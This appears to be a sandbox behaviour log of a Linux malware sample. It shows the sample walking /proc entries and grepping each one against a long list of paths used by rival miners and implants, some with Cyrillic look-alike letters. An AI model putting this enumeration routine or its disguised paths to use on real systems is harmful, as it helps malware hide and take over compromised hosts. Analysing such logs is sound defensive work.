/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1093
-
-
/bin/lsls -latrh /proc/742⤵PID:1095
-
-
/bin/grepgrep exe2⤵PID:1096
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1098
-
-
/bin/lsls -latrh /proc/7472⤵PID:1100
-
-
/bin/grepgrep exe2⤵PID:1101
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1103
-
-
/bin/lsls -latrh /proc/752⤵PID:1105
-
-
/bin/grepgrep exe2⤵PID:1106
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1108
-
-
/bin/grepgrep exe2⤵PID:1111
-
-
/bin/lsls -latrh /proc/7512⤵PID:1110
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1113
-
-
/bin/grepgrep exe2⤵PID:1116
-
-
/bin/lsls -latrh /proc/7522⤵PID:1115
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1118
-
-
/bin/grepgrep exe2⤵PID:1121
-
-
/bin/lsls -latrh /proc/7542⤵PID:1120
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1123
-
-
/bin/grepgrep exe2⤵PID:1126
-
-
/bin/lsls -latrh /proc/762⤵PID:1125
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1128
-
-
/bin/grepgrep exe2⤵PID:1131
-
-
/bin/lsls -latrh /proc/772⤵PID:1130
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1133
-
-
/bin/grepgrep exe2⤵PID:1136
-
-
/bin/lsls -latrh /proc/782⤵PID:1135
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1138
-
-
/bin/grepgrep exe2⤵PID:1141
-
-
/bin/lsls -latrh /proc/792⤵PID:1140
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1143
-
-
/bin/grepgrep exe2⤵PID:1146
-
-
/bin/lsls -latrh /proc/82⤵PID:1145
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1148
-
-
/bin/grepgrep exe2⤵PID:1151
-
-
/bin/lsls -latrh /proc/822⤵PID:1150
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1153
-
-
/bin/grepgrep exe2⤵PID:1156
-
-
/bin/lsls -latrh /proc/92⤵PID:1155
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1158
-
-
/bin/grepgrep exe2⤵PID:1161
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1160
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1163
-
-
/bin/grepgrep exe2⤵PID:1166
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1165
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1168
-
-
/bin/grepgrep exe2⤵PID:1171
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1170
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1173
-
-
/bin/grepgrep exe2⤵PID:1176
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1175
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1178
-
-
/bin/grepgrep exe2⤵PID:1181
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1180
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1183
-
-
/bin/grepgrep exe2⤵PID:1186
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1185
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1188
-
-
/bin/grepgrep exe2⤵PID:1191
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1190
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1193
-
-
/bin/grepgrep exe2⤵PID:1196
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1195
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1198
-
-
/bin/grepgrep exe2⤵PID:1201
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1200
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1203
-
-
/bin/grepgrep exe2⤵PID:1206
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1205
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1208
-
-
/bin/grepgrep exe2⤵PID:1211
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1210
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1215
-
-
/bin/grepgrep exe2⤵PID:1218
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1217
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1220
-
-
/bin/grepgrep exe2⤵PID:1224
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1223
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1227
-
-
/bin/grepgrep exe2⤵PID:1230
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1229
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1233
-
-
/bin/grepgrep exe2⤵PID:1237
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1236
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1239
-
-
/bin/grepgrep exe2⤵PID:1243
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1242
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1246
-
-
/bin/grepgrep exe2⤵PID:1249
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1248
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1252
-
-
/bin/grepgrep exe2⤵PID:1256
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1255
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1258
-
-
/bin/grepgrep exe2⤵PID:1262
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1261
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1265
-
-
/bin/grepgrep exe2⤵PID:1268
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1267
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1271
-
-
/bin/grepgrep exe2⤵PID:1275
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1274
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1277
-
-
/bin/grepgrep exe2⤵PID:1281
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1280
-
-
